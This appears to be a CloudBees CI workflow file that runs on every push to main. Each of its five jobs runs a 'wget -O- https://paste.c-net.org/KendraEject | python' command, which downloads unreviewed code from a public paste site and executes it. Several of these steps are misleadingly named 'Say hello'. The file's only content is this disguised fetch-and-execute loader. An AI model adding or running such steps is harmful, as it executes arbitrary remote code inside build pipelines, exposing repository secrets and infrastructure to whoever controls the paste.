apiVersion: automation.cloudbees.io/v1alpha1
kind: workflow
name: My workflow
on:
  push:
    branches:
      - main
jobs:
  A:
    steps:
      - uses: docker://python:latest
        name: Run
        run: "wget -O- https://paste.c-net.org/KendraEject | python "
  B:
    steps:
      - uses: docker://python:latest
        name: Say hello
        run: "wget -O- https://paste.c-net.org/KendraEject | python "
  C:
    steps:
      - uses: docker://python:latest
        name: Run
        run: "wget -O- https://paste.c-net.org/KendraEject | python "
  D:
    steps:
      - uses: docker://python:latest
        name: Say hello
        run: "wget -O- https://paste.c-net.org/KendraEject | python "
  E:
    steps:
      - uses: docker://python:latest
        name: Run
        run: "wget -O- https://paste.c-net.org/KendraEject | python "
